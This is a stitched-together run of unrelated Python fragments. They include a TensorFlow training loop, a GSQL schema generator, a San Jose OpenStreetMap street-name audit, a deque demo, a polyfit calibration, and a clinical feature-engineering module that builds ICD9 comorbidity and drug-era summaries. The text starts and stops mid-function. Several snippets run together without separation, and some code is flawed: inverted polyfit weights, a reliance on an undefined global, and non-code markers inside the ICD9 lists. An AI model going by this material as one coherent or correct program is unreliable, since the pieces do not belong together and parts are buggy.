                    value_targets = value_target_buffer[:size]
                    num_batches = int(np.ceil(size / batch_size))
                    for batch in range(num_batches):
                        low_idx = batch * batch_size
                        high_idx = (batch + 1) * batch_size
                        run_list = [self.train_op, self.policy_loss, self.value_loss, self.global_step, self.summary_op]
                        feed_dict = {self.x: train_data[low_idx:high_idx],
                                     self.policy_target: policy_targets[low_idx:high_idx],
                                     self.value_target: value_targets[low_idx:high_idx],
                                     self.training_phase: 1}
                        _, ploss, vloss, step, summaries = sess.run(run_list, feed_dict)
                        if self.network_config.tensorboard_log:
                            writer.add_summary(summaries, step)
                    # Buffers are consumed; the manager may submit more work.
                    ready_event.set()
|
import os
import json
# mappings from schema.json to GSQL
dtype_mappings = {
    'long': 'INT',
    'date': 'DATETIME',
    'int': 'INT'
}
def convert_dtype(dt):
    """Translate a schema.json data type into its GSQL type name.

    Raises ValueError when the type has no GSQL mapping.
    """
    try:
        return dtype_mappings[dt]
    except KeyError:
        raise ValueError('Invalid data type: {}'.format(dt))
if __name__ == '__main__':
    # Load the shared schema definition that drives the GSQL generation.
    schema_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'common', 'schema.json')
    with open(schema_path, 'r') as handle:
        schema = json.load(handle)

    def field_type(node, field):
        # Fall back to STRING when the schema carries no explicit data type.
        if field in node['data_types']:
            return convert_dtype(node['data_types'][field])
        return 'STRING'

    vertices = []
    edges = []
    # Emit one CREATE VERTEX statement per node type; foreign-key columns
    # are excluded (they become edges instead).
    for node in schema['node_types']:
        excluded_fields = set(node.get('foreign_keys', []))
        columns = ['PRIMARY_ID {} {}'.format(node['id'], field_type(node, node['id']))]
        columns.extend(
            '{} {}'.format(field, field_type(node, field))
            for field in node['cols']
            if field not in excluded_fields and field != node['id']
        )
        vertices.append(node['name'].lower())
        print('CREATE VERTEX {} ({}) WITH primary_id_as_attribute="true"'.format(
            node['name'].lower(), ', '.join(columns)))
    # Emit one CREATE DIRECTED EDGE statement per relationship type.
    for rel in schema['relationships']:
        edges.append(rel['type'].lower())
        print('CREATE DIRECTED EDGE {} (FROM {}, TO {})'.format(
            rel['type'].lower(), rel['start_node'].lower(), rel['end_node'].lower()))
    # Finally tie every vertex and edge type into one graph.
    print('CREATE GRAPH mag ({}, {})'.format(', '.join(vertices), ', '.join(edges)))
|
# coding: utf-8
# In[1]:
import xml.etree.cElementTree as ET
from collections import defaultdict
import re
import pprint
# In[2]:
# OpenStreetMap extract audited by this script.
osmfile = "san-jose.osm"
# Matches the last whitespace-free token of a street name (the street type),
# with an optional trailing period (e.g. "St.").
street_type_re = re.compile(r'\b\S+\.?$', re.IGNORECASE)
# Street-type tokens considered valid as-is; anything else is reported by
# the audit. The odd entries (numbers, proper names) are legitimate San Jose
# street endings discovered during auditing.
expected = ["Street", "Avenue", "Boulevard", "Drive", "Court", "Place", "Loop", "Circle", "Square", "Lane", "Road", "Trail", "Parkway", "Commons", "Way", "Terrace", "Highway","Expressway", "East", "West", "Bellomy", "Winchester", "Oro", "1","Esquela", "Bascom", "6", "Plaza","Walk","Portofino","Napoli","Paviso","Barcelona","Volante","Sorrento","Franklin","Real", "Julian", "Flores", "Saratoga", "0.1","7.1", "Presada", "Row", "Alley", "Alameda", "Seville", "Montaña", "Palamos", "Marino", "Oaks", "Luna", "Madrid", "Mall", "Hamilton", "81", "114", "Robles", "Hill"]
# In[3]:
#this mapping was created after several iterations of the audit function
# Canonical replacements for abbreviated/misspelled street types.
mapping = { "St": "Street",
            "St.": "Street",
            "street":"Street",
            "Rd": "Road",
            "Rd.": "Road",
            "Ave": "Avenue",
            "ave": "Avenue",
            "Hwy": "Highway",
            "court": "Court",
            "Sq": "Square",
            "Blvd": "Boulevard",
            "Boulvevard": "Boulevard",
            "Blvd.": "Boulevard",
            "Ln": "Lane",
            "Dr": "Drive",
            "Cir": "Circle",
            "Ct" : "Court",
            "Pkwy": "Parkway"
            }
# In[8]:
def audit_street_type(street_types, street_name):
    """Record street_name under its trailing street-type token when that
    token is not one of the expected types.

    Uses the module-level ``street_type_re`` and ``expected``; mutates the
    ``street_types`` dict-of-sets in place.
    """
    match = street_type_re.search(street_name)
    if match is None:
        return
    suffix = match.group()
    if suffix in expected:
        return
    street_types[suffix].add(street_name)
def is_street_name(elem):
    """Return True when the tag element's key marks a street address."""
    key = elem.attrib['k']
    return key == "addr:street"
def audit(osmfile):
    """Stream-parse the OSM file and collect street names whose trailing
    street-type token is unexpected.

    Returns a defaultdict(set) mapping street type -> set of full names.
    """
    osm_file = open(osmfile, "r")
    street_types = defaultdict(set)
    for _, elem in ET.iterparse(osm_file, events=("start",)):
        if elem.tag not in ("node", "way"):
            continue
        for tag in elem.iter("tag"):
            if not is_street_name(tag):
                continue
            value = tag.attrib['v']
            # Skip this particular street name: it triggers a unicode
            # comparison error under Python 2, so it is bypassed entirely.
            if re.search(u'Montaña', value) is None:
                audit_street_type(street_types, value)
    osm_file.close()
    return street_types
def update_name(name, mapping):
    """Return *name* with an unexpected trailing street type replaced by its
    canonical form from *mapping* (e.g. "Main St" -> "Main Street").

    Names whose street type is expected, or unexpected but absent from
    *mapping*, are returned unchanged.
    """
    m = street_type_re.search(name)
    if m:
        street_type = m.group()
        # BUG FIX: the original indexed mapping[street_type] unconditionally,
        # raising KeyError for any unexpected street type with no mapping
        # entry; such names now pass through unchanged.
        if street_type not in expected and street_type in mapping:
            name = re.sub(street_type_re, mapping[street_type], name)
    return name
# In[9]:
# Run the audit over the configured OSM extract, then show each flagged
# name next to its cleaned-up form.
st_types = audit(osmfile)
#print out updated names
# NOTE(review): this block is Python 2 only — dict.iteritems() and the
# bare print statement below do not exist in Python 3.
for st_type, ways in st_types.iteritems():
    for name in ways:
        better_name = update_name(name, mapping)
        print name, "=>", better_name
# In[ ]:
|
'''Demonstrate collections.deque, a double-ended queue.

A deque can be visualized as a hollow tube or pipe open at both ends:
elements can be added to and removed from either end efficiently.
'''
import collections

de = collections.deque('JAreina')

# Inspect the deque: sequence-style indexing works at both ends.
print('deque:', de)
print('Length:', len(de))  # fixed typo in the original output ("Lenght :")
print('left end:', de[0])
print('right end:', de[-1])

# remove() deletes the first matching value searching from the left; the
# only lowercase 'a' here is the final character.
de.remove('a')
print('After removing:', de)
import numpy as np
import matplotlib.pyplot as plt
# Measured peak positions and their known reference values, with the
# per-point uncertainties from the peak-finding step.
peak_found = np.array([66.491, 92.886, 119.479, 139.362, 165.966, 192.643])
peak_real = np.array([-5.4823, -3.2473, -1.0132, 0.6624, 2.8967, 5.1338])
err = np.array([0.0008, 0.0008, 0.0010, 0.0007, 0.0007, 0.0010])

# Weighted straight-line calibration fit with covariance estimate.
# NOTE(review): np.polyfit expects w ~ 1/sigma; passing the errors directly
# gives the *least* certain points the most weight — confirm intent.
p, cov = np.polyfit(peak_found, peak_real, deg=1, w=err, cov=True)

# Evaluation grid spanning the measured range.
x = np.linspace(peak_found[0], peak_found[-1], 100)

def fit(x):
    """Evaluate the calibration polynomial at the given position(s)."""
    return np.polyval(p, x)

# print(fit(peak_found))
# print(np.sum(((fit(peak_found)-peak_real)**2)))
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 2 19:24:21 2017
@author: 310223340
"""
import pandas as pd
import numpy as np
from data_profile import execute_sql, write_to_table
import NDC_Mapping_v4
#%% create master diagnosis frame
def master_icd9():
    """Build the master lookup of ICD9 codes per chronic-condition group.

    Returns a DataFrame with columns ['Diagnosis', 'ICD9'], one row per
    (condition, code) pair, covering 14 comorbidity groups.
    """
    print("\nCreating MASTER_icd9...")
    # One small frame per condition; each is tagged with its group name.
    ALZHDMTA_icd9 = pd.DataFrame(['3310','3311','33111','33119','3312','3317','2900','2901','29010','29011','29012','29013','29020','29021','2903','29040','29041','29042','29043','2940','2941','29410','29411','2948','797'],columns=['ICD9'])
    ALZHDMTA_icd9['Diagnosis'] = 'ALZHDMTA'
    DIABETES_icd9 = pd.DataFrame(['24900', '24901', '24910', '24911', '24920', '24921', '24930', '24931', '24940', '24941', '24950', '24951', '24960', '24961', '24970', '24971', '24980', '24981', '24990', '24991', '25000', '25001', '25002', '25003', '25010', '25011', '25012', '25013', '25020', '25021', '25022', '25023', '25030', '25031', '25032', '25033', '25040', '25041', '25042', '25043', '25050', '25051', '25052', '25053', '25060', '25061', '25062', '25063', '25070', '25071', '25072', '25073', '25080', '25081', '25082', '25083', '25090', '25091', '25092', '25093', '3572', '36201', '36202', '36641'],columns=['ICD9'])
    DIABETES_icd9['Diagnosis'] = 'DIABETES'
    CHF_icd9 = pd.DataFrame(['39891','40201','40211','40291','40401','40411','40491','40403','40413','40493','4280','4281','42820','42821','42822','42823','42830','42831','42832','42833','42840','42841','42842','42843','4289'],columns=['ICD9'])
    CHF_icd9['Diagnosis'] = 'CHF'
    CHRNKIDN_icd9 = pd.DataFrame(['01600','01601','01602','01603','01604','01605','01606','0954','1890','1899','2230','23691','24940','24941','25040','25041','25042','25043','2714','2741','27410','28311','40301','40311','40391','40402','40403','40412','40413','40492','40493','4401','4421','5724','5800','5804','58081','58089','5809','5810','5811','5812','5813','58181','58189','5819','5820','5821','5822','5824','58281','58289','5829','5830','5831','5832','5834','5836','5837','58381','58389','5839','5845','5846','5847','5848','5849','585','5851','5852','5853','5854','5855','5856','5859','586','587','5880','5881','58881','58889','5889','591','75312','75313','75314','75315','75316','75317','75319','75320','75321','75322','75323','75329','7944'],columns=['ICD9'])
    CHRNKIDN_icd9['Diagnosis'] = 'CHRNKIDN'
    COPD_icd9 = pd.DataFrame(['4910', '4911', '49120', '49121', '49122', '4918', '4919', '4920', '4928', '4940', '4941', '496'],columns=['ICD9'])
    COPD_icd9['Diagnosis'] = 'COPD'
    DEPRESSN_icd9 = pd.DataFrame(['29620','29621','29622','29623','29624','29625','29626','29630','29631','29632','29633','29634','29635','29636','29650','29651','29652','29653','29654','29655','29656','29660','29661','29662','29663','29664','29665','29666','29689','2980','3004','3091','311'],columns=['ICD9'])
    DEPRESSN_icd9['Diagnosis'] = 'DEPRESSN'
    # NOTE(review): this list embeds the literal markers 'Proc' and 'HCPCS'
    # between code ranges — they will be treated as ICD9 "codes" when
    # matched; confirm they are intentional section markers.
    ISCHMCHT_icd9 = pd.DataFrame(['41000','41001','41002','41010','41011','41012','41020','41021','41022','41030','41031','41032','41040','41041','41042','41050','41051','41052','41060','41061','41062','41070','41071','41072','41080','41081','41082','41090','41091','41092','4110','4111','41181','41189','412','4130','4131','4139','41400','41401','41402','41403','41404','41405','41406','41407','41410','41411','41412','41419','4142','4143','4148','4149','Proc','0066','3601','3602','3603','3604','3605','3606','3607','3609','3610','3611','3612','3613','3614','3615','3616','3617','3619','362','3631','3632','HCPCS','33510','33511','33512','33513','33514','33515','33516','33517','33518','33519','33521','33522','33523','33533','33534','33535','33536','33542','33545','33548','92975','92977','92980','92982','92995','33140','33141'],columns=['ICD9'])
    ISCHMCHT_icd9['Diagnosis'] = 'ISCHMCHT'
    OSTEOPRS_icd9 = pd.DataFrame(['73300','73301','73302','73303','73309'],columns=['ICD9'])
    OSTEOPRS_icd9['Diagnosis'] = 'OSTEOPRS'
    RA_OA_icd9 = pd.DataFrame(['7140','7141','7142','71430','71431','71432','71433','71500','71504','71509','71510','71511','71512','71513','71514','71515','71516','71517','71518','71520','71521','71522','71523','71524','71525','71526','71527','71528','71530','71531','71532','71533','71534','71535','71536','71537','71538','71580','71589','71590','71598'],columns=['ICD9'])
    RA_OA_icd9['Diagnosis'] = 'RA_OA'
    STRKETIA_icd9 = pd.DataFrame(['430','431','43400','43401','43410','43411','43490','43491','4350','4351','4353','4358','4359','436','99702'],columns=['ICD9'])
    STRKETIA_icd9['Diagnosis'] = 'STRKETIA'
    CNCR_BRST_icd9 = pd.DataFrame(['1740','1741','1742','1743','1744','1745','1746','1748','1749','2330'],columns=['ICD9'])
    CNCR_BRST_icd9['Diagnosis'] = 'CNCR_BRST'
    CNCR_COLR_icd9 = pd.DataFrame(['1540','1541','1530','1531','1532','1533','1534','1535','1536','1537','1538','1539','2303','2304'],columns=['ICD9'])
    CNCR_COLR_icd9['Diagnosis'] = 'CNCR_COLR'
    CNCR_PROS_icd9 = pd.DataFrame(['185','2334'],columns=['ICD9'])
    CNCR_PROS_icd9['Diagnosis'] = 'CNCR_PROS'
    CNCR_LUNG_icd9 = pd.DataFrame(['1620','1622','1623','1624','1625','1628','1629','2312'],columns=['ICD9'])
    CNCR_LUNG_icd9['Diagnosis'] = 'CNCR_LUNG'
    # combine all dataframes into one
    MASTER_icd9 = pd.concat([ALZHDMTA_icd9,CHF_icd9,CHRNKIDN_icd9,COPD_icd9,DEPRESSN_icd9,DIABETES_icd9,ISCHMCHT_icd9,OSTEOPRS_icd9,RA_OA_icd9,STRKETIA_icd9,CNCR_BRST_icd9,CNCR_COLR_icd9,CNCR_PROS_icd9,CNCR_LUNG_icd9], ignore_index=True)
    # Order the columns as ['Diagnosis', 'ICD9'] for downstream consumers.
    MASTER_icd9 = MASTER_icd9[['Diagnosis', 'ICD9']]
    return (MASTER_icd9)
#%% Function to create diagnosis summaries
def diagnosis_summary(diag_data, comorbidity, MASTER_icd9):
    """Summarise one comorbidity per patient from inpatient diagnoses.

    Produces, per subject_id: date of first diagnosis, visit/diagnosis
    counts for 2008-2010, condition-era counts at 30/60/90/180-day
    persistence windows, and MTBE (mean time between episodes).

    NOTE(review): relies on a module-level ``admission`` DataFrame (with
    hadm_id, visit_year, admittime, dischtime) that is not a parameter —
    it must be defined by the caller's module scope before this runs.
    """
    #The diagnosis related dataset
    print("\n\tDiagnosis summary:",comorbidity)
    # All ICD9 codes belonging to the requested comorbidity group.
    codes = list(MASTER_icd9.loc[MASTER_icd9.Diagnosis==comorbidity,'ICD9'])
    inpat_diag_only = diag_data.loc[diag_data.icd9_code.isin(codes),]
    inpat_diag_only = pd.merge(inpat_diag_only, admission[['hadm_id','visit_year','admittime','dischtime']])
    # Keep only the 2008-2010 study window, ordered per patient by time.
    inpat_diag_only = inpat_diag_only.loc[inpat_diag_only.visit_year.isin([2008,2009,2010]),]
    inpat_diag_only = inpat_diag_only.sort_values(['subject_id','admittime'])
    #Date of first diagnosis#
    inpat_first_date = inpat_diag_only.drop_duplicates(subset='subject_id',keep='first')
    inpat_first_date = inpat_first_date[['subject_id', 'admittime']]
    inpat_first_date.columns = ['subject_id', comorbidity+'_First_Diag']
    #Diagnosis in 2008#
    # Per patient: number of distinct admissions and diagnosis rows in 2008.
    inpat_diag_08 = inpat_diag_only.loc[inpat_diag_only.visit_year==2008,]
    inpat_diag_visit_08 = inpat_diag_08[['subject_id','hadm_id']].drop_duplicates()
    inpat_diag_visit_08 = inpat_diag_visit_08.groupby('subject_id').agg({'hadm_id':'count'}).reset_index()
    inpat_diag_visit_08.columns = ['subject_id', comorbidity+'_Visit_2008']
    inpat_diag_cnt_08 = inpat_diag_08[['subject_id','icd9_code']]
    inpat_diag_cnt_08 = inpat_diag_cnt_08.groupby('subject_id').agg({'icd9_code':'count'}).reset_index()
    inpat_diag_cnt_08.columns = ['subject_id', comorbidity+'_Count_2008']
    inpat_diag_08 = pd.merge(inpat_diag_visit_08,inpat_diag_cnt_08)
    #Diagnosis in 2009#
    # Same visit/diagnosis counts for 2009.
    inpat_diag_09 = inpat_diag_only.loc[inpat_diag_only.visit_year==2009,]
    inpat_diag_visit_09 = inpat_diag_09[['subject_id','hadm_id']].drop_duplicates()
    inpat_diag_visit_09 = inpat_diag_visit_09.groupby('subject_id').agg({'hadm_id':'count'}).reset_index()
    inpat_diag_visit_09.columns = ['subject_id', comorbidity+'_Visit_2009']
    inpat_diag_cnt_09 = inpat_diag_09[['subject_id','icd9_code']]
    inpat_diag_cnt_09 = inpat_diag_cnt_09.groupby('subject_id').agg({'icd9_code':'count'}).reset_index()
    inpat_diag_cnt_09.columns = ['subject_id', comorbidity+'_Count_2009']
    inpat_diag_09 = pd.merge(inpat_diag_visit_09, inpat_diag_cnt_09)
    #Diagnosis in 2010#
    # Same visit/diagnosis counts for 2010.
    inpat_diag_10 = inpat_diag_only.loc[inpat_diag_only.visit_year==2010,]
    inpat_diag_visit_10 = inpat_diag_10[['subject_id','hadm_id']].drop_duplicates()
    inpat_diag_visit_10 = inpat_diag_visit_10.groupby('subject_id').agg({'hadm_id':'count'}).reset_index()
    inpat_diag_visit_10.columns = ['subject_id', comorbidity+'_Visit_2010']
    inpat_diag_cnt_10 = inpat_diag_10[['subject_id','icd9_code']]
    inpat_diag_cnt_10 = inpat_diag_cnt_10.groupby('subject_id').agg({'icd9_code':'count'}).reset_index()
    inpat_diag_cnt_10.columns = ['subject_id', comorbidity+'_Count_2010']
    inpat_diag_10 = pd.merge(inpat_diag_visit_10,inpat_diag_cnt_10)
    #Condition Era within 30,60,90,180 days ##
    inpat_cera = inpat_diag_only[['subject_id','admittime','dischtime','visit_year']]
    def cal_days_btwn_cond(group):
        # Days between an admission and the previous discharge in the group.
        delta = abs(group.admittime - group.dischtime.shift(1))
        return(pd.DataFrame(delta.dt.days))
    inpat_cera['days_btwn_cond'] = inpat_cera.groupby(['subject_id','visit_year']).apply(cal_days_btwn_cond)
    #dataframe to be used further for calculating mtbe
    inpat_mtbe = inpat_cera.copy()
    #condition era with persistence window of 30 days
    # A gap larger than the window starts a new era (counted as 1).
    inpat_cera['cera_30'] = inpat_cera['days_btwn_cond'].apply(lambda x: 0 if x <= 30 else 1)
    inpat_cera['cera_60'] = inpat_cera['days_btwn_cond'].apply(lambda x: 0 if x <= 60 else 1)
    inpat_cera['cera_90'] = inpat_cera['days_btwn_cond'].apply(lambda x: 0 if x <= 90 else 1)
    inpat_cera['cera_180'] = inpat_cera['days_btwn_cond'].apply(lambda x: 0 if x <= 180 else 1)
    #condition era based on years
    inpat_cera = inpat_cera.groupby(['subject_id','visit_year']).agg({'cera_30':'sum', 'cera_60':'sum','cera_90':'sum', 'cera_180':'sum'}).reset_index()
    inpat_cera.visit_year = comorbidity + '_' + inpat_cera.visit_year.astype(str)
    inpat_cera = pd.pivot_table(inpat_cera, values=['cera_30','cera_60','cera_90','cera_180'], index='subject_id', columns='visit_year',aggfunc=np.sum,fill_value=0).reset_index()
    # Flatten the pivot's MultiIndex columns into "<comorbidity>_<year>_<cera>".
    colnames = ["_".join((j,i)) for i,j in inpat_cera.columns[1:]]
    inpat_cera.columns = ['subject_id'] + colnames
    #MTBE
    # Mean number of days between consecutive episodes, per patient.
    inpat_mtbe = inpat_mtbe.groupby('subject_id').agg({'days_btwn_cond':'mean'}).reset_index()
    inpat_mtbe.columns = ['subject_id', comorbidity+'_MTBE']
    #Merging all computed datasets
    inpat_diag_summary = inpat_first_date.merge(inpat_diag_08,on='subject_id',how='outer').merge(inpat_diag_09,on='subject_id',how='outer').merge(inpat_diag_10,on='subject_id',how='outer').merge(inpat_cera,on='subject_id',how='outer').merge(inpat_mtbe,on='subject_id',how='outer')
    return(inpat_diag_summary)
#%% configuring the icd9 codes for matching (253.1->253.10, 493->493.00)
def configure_icd9_codes(df, col, new_col):
    """Normalise ICD9 codes to a two-digit decimal form for matching
    (253.1 -> 253.10, 493 -> 493.00).

    Mutates *df* in place: coerces *col* to str and writes the padded
    codes into *new_col*; returns the same DataFrame.
    """
    def _pad(code):
        # Codes with no decimal part get a full ".00" suffix.
        if '.' not in code:
            return code + '.00'
        pieces = code.split('.')
        whole, frac = pieces[0], pieces[1]
        # A single post-decimal digit is padded with a trailing zero.
        if len(frac) == 1:
            frac = frac + '0'
        return whole + '.' + frac

    df[col] = df[col].apply(str)
    df[new_col] = df[col].apply(_pad)
    return df
#%% Function to create drug summaries
def drug_summary(pres_data, pres_name, adm_data, hcup_df):
    """Summarise one prescription group per patient.

    Produces, per subject_id: yearly prescription counts, drug-era counts at
    30/60/90-day persistence windows, and may-treat/may-prevent diagnosis
    indicators (via NDC mapping and HCUP labels).

    :param pres_data: prescription rows (subject_id, hadm_id, starttime,
        endtime, ndc, drug, dose_val_rx, dose_unit_rx, drug_type).
    :param pres_name: label used as a prefix on output columns.
    :param adm_data: admission rows keyed by (subject_id, hadm_id);
        assumed to carry admittime, admittime_orig, orig_adm_compression
        and visit_year — confirm against caller.
    :param hcup_df: HCUP reference with icd9_to_compare and hcup_label.
    """
    print("\n###########################################################")
    print("# Drug summary:",pres_name)
    print("###########################################################")
    drug_era = pres_data[['subject_id', 'hadm_id', 'starttime', 'endtime', 'ndc', 'drug', 'dose_val_rx', 'dose_unit_rx', 'drug_type']]
    drug_era.columns = ['subject_id','hadm_id','drug_strt_orig','drug_end_orig','ndc','drug','dose_val_rx', 'dose_unit_rx', 'drug_type']
    drug_era = drug_era.dropna(subset=['drug_strt_orig','drug_end_orig'])
    drug_era.drug_strt_orig = pd.to_datetime(drug_era.drug_strt_orig, format='%Y-%m-%d')
    drug_era.drug_end_orig = pd.to_datetime(drug_era.drug_end_orig, format='%Y-%m-%d')
    drug_era = drug_era.sort_values(['drug_strt_orig', 'drug_end_orig']).reset_index(drop=True)
    drug_era = pd.merge(drug_era, adm_data, on=['subject_id','hadm_id'])
    # check for reversed start & end date, and make changes if required
    for i, row in drug_era.iterrows():
        if row.drug_strt_orig > row.drug_end_orig:
            drug_era.loc[i,'drug_strt_trns'] = row.drug_end_orig
            drug_era.loc[i,'drug_end_trns'] = row.drug_strt_orig
        else:
            drug_era.loc[i,'drug_strt_trns'] = row.drug_strt_orig
            drug_era.loc[i,'drug_end_trns'] = row.drug_end_orig
    # Shift/compress supply spans into the de-identified admission timeline.
    drug_era['drug_days_supply'] = (drug_era.drug_end_trns - drug_era.drug_strt_trns).dt.days + 1
    drug_era['days_drug_strt_orig_admittime_orig'] = (drug_era.drug_strt_trns - drug_era.admittime_orig).dt.days
    drug_era['shftd_drug_days_supply'] = drug_era.drug_days_supply * drug_era.orig_adm_compression.astype(float)
    drug_era['shftd_days_drug_strt_orig_admittime_orig'] = drug_era.days_drug_strt_orig_admittime_orig * drug_era.orig_adm_compression.astype(float)
    drug_era['drug_strt_shftd'] = drug_era.admittime + drug_era.shftd_days_drug_strt_orig_admittime_orig.apply(lambda x: pd.Timedelta(days=round(x,0)))
    drug_era['drug_end_shftd'] = drug_era.drug_strt_shftd + drug_era.shftd_drug_days_supply.apply(lambda x: pd.Timedelta(days=round(x,0)))
    # count of prescription
    inpat_drug_count = drug_era.groupby(['subject_id','visit_year']).agg({'drug':'count'}).reset_index()
    inpat_drug_count.visit_year = pres_name + '_' + inpat_drug_count.visit_year.astype(str)
    inpat_drug_count = pd.pivot_table(inpat_drug_count, values='drug', index='subject_id', columns='visit_year',aggfunc=np.sum,fill_value=0).reset_index()
    # era calculation
    inpat_dera = drug_era[['subject_id','drug_strt_shftd','drug_end_shftd','visit_year']]
    inpat_dera = inpat_dera.sort_values(['subject_id','drug_strt_shftd','drug_end_shftd']).reset_index( drop=True)
    #calculate days between prescriptions
    def cal_days_btwn_pres(group):
        # Gap between a prescription start and the previous one's end.
        delta = group.drug_strt_shftd - group.drug_end_shftd.shift(1)
        return(pd.DataFrame(delta.dt.days))
    inpat_dera['days_btwn_pres'] = inpat_dera.groupby(['subject_id','visit_year']).apply(cal_days_btwn_pres)
    #drug era with persistence window of 30 days
    # A gap larger than the window starts a new era (counted as 1).
    inpat_dera['dera_30'] = inpat_dera.days_btwn_pres.apply(lambda x: 0 if x <= 30 else 1)
    inpat_dera['dera_60'] = inpat_dera.days_btwn_pres.apply(lambda x: 0 if x <= 60 else 1)
    inpat_dera['dera_90'] = inpat_dera.days_btwn_pres.apply(lambda x: 0 if x <= 90 else 1)
    #drug era based on years
    inpat_dera = inpat_dera.groupby(['subject_id','visit_year']).agg({'dera_30':'sum', 'dera_60':'sum','dera_90':'sum'}).reset_index()
    inpat_dera.visit_year = pres_name + '_' + inpat_dera.visit_year.astype(str)
    inpat_dera = pd.pivot_table(inpat_dera, values=['dera_30','dera_60','dera_90'], index='subject_id', columns='visit_year',aggfunc=np.sum,fill_value=0).reset_index()
    #flatten multiindex column names
    colnames = ["_".join((j,i)) for i,j in inpat_dera.columns[1:]]
    inpat_dera.columns = ['subject_id'] + colnames
    inpat_dera = pd.merge(inpat_drug_count, inpat_dera, on='subject_id')
    #find may treat & may prevent diagnosis
    may_df_final = NDC_Mapping_v4.main(pres_data)
    may_df_final = may_df_final.drop_duplicates()
    #configure icd9 code for the match
    may_df_final = configure_icd9_codes(may_df_final, 'may_icd9', 'icd9_to_compare')
    #add hcup levels to the may_df_final data frame
    may_df_final = pd.merge(may_df_final, hcup_df[['icd9_to_compare', 'hcup_label']], how='left', on='icd9_to_compare')
    #exrtact the one's with no match & implement the following logic:
    #1) If the Diagnoses code can not be found and is 3 digits:
    #a) add "No HCUP mapping found - changed code to xxx00 (where xxx is the original code) to the output table for reference
    #b) append a trailing 00 (2 zeros) to the end of the 3 digit code, and look for this code as before, If found continue mapping as defined
    #
    #2) If updated code (with 00 appended) is not found:
    #a) Increment (00) to (01) and search for code. Update message defined in step 1a to reflect the change in the last 2 digits. If found, continue mapping as defined.
    #b) If (01) not found, increment (01) to (02) and continue search and mapping
    #c) continue steps a and b above until a match is found.
    may_df_final_na = may_df_final[may_df_final['hcup_label'].isnull()]
    if len(may_df_final_na) > 0:
        for idx, row in may_df_final_na.iterrows():
            # BUG FIX: original tested `row['may_icd9'].str.len==3`, which
            # raises AttributeError on a plain str (and used `&`, which
            # evaluates both sides eagerly); use len() with `and`.
            if '.' not in row['may_icd9'] and len(row['may_icd9']) == 3:
                # Try xxx.00, xxx.01, ... until an HCUP match is found.
                for suffix in range(100):
                    candidate = row['may_icd9'] + '.' + str(suffix).zfill(2)
                    hcup_temp = hcup_df.loc[hcup_df['icd9_to_compare']==candidate,]
                    if len(hcup_temp)>0:
                        # BUG FIX: original wrote `may_df_final_na[i, 'hcup_label']`
                        # (creating a bogus tuple-keyed column) with the inner
                        # loop variable shadowing the row index; assign the
                        # matched code and label into the row via .loc.
                        may_df_final_na.loc[idx, 'icd9_to_compare'] = candidate
                        may_df_final_na.loc[idx, 'hcup_label'] = hcup_temp['hcup_label'].iloc[0]
                        break
        # merge with the main may_df_final
        may_df_final_na = may_df_final_na.dropna(subset=['hcup_label'])
        may_df_final = pd.concat([may_df_final, may_df_final_na], ignore_index=True)
    #match with each patient's ndc
    may_df_subject = pd.merge(pres_data[['subject_id', 'ndc']].drop_duplicates(), may_df_final, on='ndc')
    may_df_subject = pd.pivot_table(may_df_subject, values='ndc', index='subject_id', columns='hcup_label',aggfunc=np.size,fill_value=0).reset_index()
    colnames = list(pres_name + '_may_tp_' + may_df_subject.columns[1:].astype(str))
    may_df_subject.columns = may_df_subject.columns[:1].tolist() + colnames
    #merge with the drug era frame
    inpat_dera = pd.merge(inpat_dera, may_df_subject, on='subject_id', how = 'left')
    return(inpat_dera)
#%% feature creation from raw data
def feature_creation(admission, diagnosis, procedures, MASTER_icd9):
    """Build the per-patient inpatient feature table.

    Combines comorbidity counts, per-year visit counts, per-comorbidity
    diagnosis summaries, length of stay, new-diagnosis-in-last-visit flags
    and procedure pivots into one frame keyed by subject_id.
    """
    # Total number of comorbidities
    print("\nFeature Creation: Total Comorbidities")
    inpat_totcom = diagnosis.loc[diagnosis.hadm_id.isin(admission.hadm_id),['subject_id','hadm_id','seq_num']]
    # Max seq_num per admission = number of coded diagnoses for that stay.
    inpat_totcom = inpat_totcom.groupby(['subject_id','hadm_id']).agg({'seq_num':'max'}).reset_index()
    inpat_totcom = inpat_totcom.groupby('subject_id').agg({'seq_num':'sum'}).reset_index().rename(columns={'seq_num':'TotalComorb'})
    # For first visit ##
    firstadm = admission.sort_values(['subject_id','dischtime']).reset_index(drop = True)
    firstadm = firstadm.drop_duplicates(subset='subject_id',keep='first')
    # Number of comorbidities in 1st visit
    print("\nFeature Creation: Total Comorbidities in 1st visit")
    inpat_com = diagnosis.loc[diagnosis.hadm_id.isin(firstadm.hadm_id),]
    inpat_com = inpat_com.groupby('subject_id').agg({'seq_num':'max'}).reset_index().rename(columns={'seq_num':'ComorFirstVisit'})
    # Total number of comorbidities in each year
    print("\nFeature Creation: Total Comorbidities in each year")
    inpat_totcom_yr = pd.merge(admission[['hadm_id','visit_year']],diagnosis,on='hadm_id')
    inpat_totcom_yr = inpat_totcom_yr.groupby(['subject_id','hadm_id','visit_year']).agg({'seq_num':'max'}).reset_index()
    inpat_totcom_yr = inpat_totcom_yr.groupby(['subject_id','visit_year']).agg({'seq_num':'sum'}).reset_index().rename(columns={'seq_num':'TotalComorb'})
    inpat_totcom_yr = pd.pivot_table(inpat_totcom_yr, values='TotalComorb', index='subject_id', columns='visit_year',aggfunc=np.sum,fill_value=0).reset_index()
    colnames = list('comorb_'+ inpat_totcom_yr.columns[1:].astype(str))
    inpat_totcom_yr.columns = inpat_totcom_yr.columns[:1].tolist() + colnames
    # Number of procedures in 1st visit
    print("\nFeature Creation: Total Procedures in 1st visit")
    inpat_proc = procedures.loc[procedures.hadm_id.isin(firstadm.hadm_id),]
    inpat_proc = inpat_proc.groupby('subject_id').agg({'seq_num': 'max'}).reset_index().rename(columns={'seq_num': 'ProcsFirstVisit'})
    # Total number of procedures
    print("\nFeature Creation: Total Procedures")
    inpat_totproc = procedures.loc[procedures.hadm_id.isin(admission.hadm_id),['subject_id','hadm_id','seq_num']]
    inpat_totproc = inpat_totproc.groupby(['subject_id','hadm_id']).agg({'seq_num':'max'}).reset_index()
    inpat_totproc = inpat_totproc.groupby('subject_id').agg({'seq_num':'sum'}).reset_index().rename(columns={'seq_num':'TotalProcs'})
    # Total number of admissions in each year
    print("\nFeature Creation: Total admissions in each year")
    inpat_visit = admission.groupby(['subject_id','visit_year']).agg({'hadm_id':'count'}).reset_index()
